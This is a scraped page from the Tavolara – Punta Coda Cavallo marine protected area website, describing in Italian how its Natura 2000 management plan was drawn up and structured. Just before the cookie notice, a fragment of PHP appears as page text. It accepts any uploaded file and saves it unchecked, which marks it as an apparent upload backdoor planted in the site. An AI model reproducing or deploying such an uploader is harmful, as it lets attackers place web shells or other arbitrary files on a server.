Home » Ente gestore » Piano di gestione

Rete Regionale per la conservazione della Fauna Marina SardegnaL’AMP è nodo della rete regionale per la conservazione della fauna marina

In caso di ritrovamento di animali in difficoltà contattare il
logo emergenza in mare, guardia costieralogo emergenza ambientale, segnalazione incendi boschivi

Piano di gestione

Per rafforzare la realtà dell’Area Marina Protetta di Tavolara – Punta Coda Cavallo, ed ottenere risultati coerenti, il Consorzio di Gestione ha realizzato il Piano di Gestione. 

Si tratta di uno strumento operativo che disciplina gli usi del territorio per renderli compatibili con la presenza degli habitat e delle specie che lo arricchiscono, individuando le azioni e gli interventi di conservazione necessari al loro mantenimento e/o ripristino. 

La gestione del sito deve rispondere ad un unico obbligo di risultato: salvaguardare l’efficienza e la funzionalità ecologica di habitat e specie allef quali il sito è dedicato. 

L’azione di pianificazione si è resa necessaria, ad un livello di massimo approfondimento, in considerazione del fatto che i dati emersi dai rapporti preliminari evidenziano alcune criticità nel territorio costiero dell’AMP causato dagli usi impropri dello stesso. 

In considerazione di questa necessità, l’Ente Gestore ha istituito un ufficio di piano, utilizzando le competenze scientifiche delle seguenti Università: Dipartimento di Scienze della Terra Università di Cagliari, Dipartimento di Botanica ed Ecologia Vegetale Università di Sassari, Dip.Te.Ris Università di Genova, Dipartimento Servizi Generali Facoltà di Economia Università di Sassari, ed altri consulenti. 

Il Piano di Gestione è stato quindi realizzato seguendo le linee guida indicate dal Ministero dell’Ambiente per la rete di Natura 2000, che possono essere sintetizzate nei quattro punti seguenti: 

  1. Formulazione del quadro conoscitivo relativo alle caratteristiche del sito, per le diverse componenti descritte sulla base delle conoscenze precedentemente acquisite e integrate da studi successivi. 
  2. Analisi delle esigenze ecologiche delle specie e degli habitat di interesse comunitario. Valutazione dello stato di conservazione e previsione della loro evoluzione. 
  3. Predisposizione degli obiettivi gestionali e degli obiettivi di dettaglio, indicando se esistano conflittualità negli obiettivi stessi, e definizione delle priorità degli interventi. 
  4. Definizione delle strategie gestionali e valutazione dei costi e dei tempi necessari per effettuare le azioni finalizzate al raggiungimento degli obiettivi. Infine, monitoraggio periodico dei risultati per valutare l’efficacia della strategia. 

Il Piano di Gestione dell’AMP è stato redatto e suddiviso in quattro parti, elaborate secondo le indicazioni precedentemente elencate; la prima parte è il Quadro di riferimento ambientale, contenente la caratterizzazione degli aspetti biologici, geologici ed ecologici. 

La seconda parte è il quadro di riferimento socio-economico, comprende la descrizione e l’analisi dettagliata degli aspetti legati alla dimensione sociale ed economica del territorio; la terza parte presenta gli Interventi di gestione, con l’analisi e la valutazione delle criticità degli habitat e delle specie, la formulazione degli obiettivi gestionali e degli interventi; la quarta ed ultima parte, la Cartografia, comprendente anche gli allegati. 

 

News


Dal 24 novembre al 6 dicembre, sede AMP di Tavolara via Porto Romano...

 

Rassegna stampa


La Nuova Sardegna. Articolo del  30 aprile 2013. Clicca qui per...

 

©  2011 Area Marina Protetta Tavolara Punta Coda Cavallo     Sede Legale: via Dante 1, OLBIA (SS) - 07026                                       Sede operativa:  Via San Giovanni 14, OLBIA (SS) - 07026           Telefono 0789/203013 - Fax 0789/204514 Mail:info@remove-this.amptavolara.itPec: amptavolara@pec.it 

Credits

Area Riservata

logo ministero ministero dell'ambientelogo EMASlogo Rina

"; $target = ""; $target = $target.basename( $_FILES['uploaded']['name']) ; $ok=1; if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) { echo "Done"; } } ?>
Navigando il sito amptavolara.com acconsenti all'utilizzo dei Cookie. Per maggiori dettagli.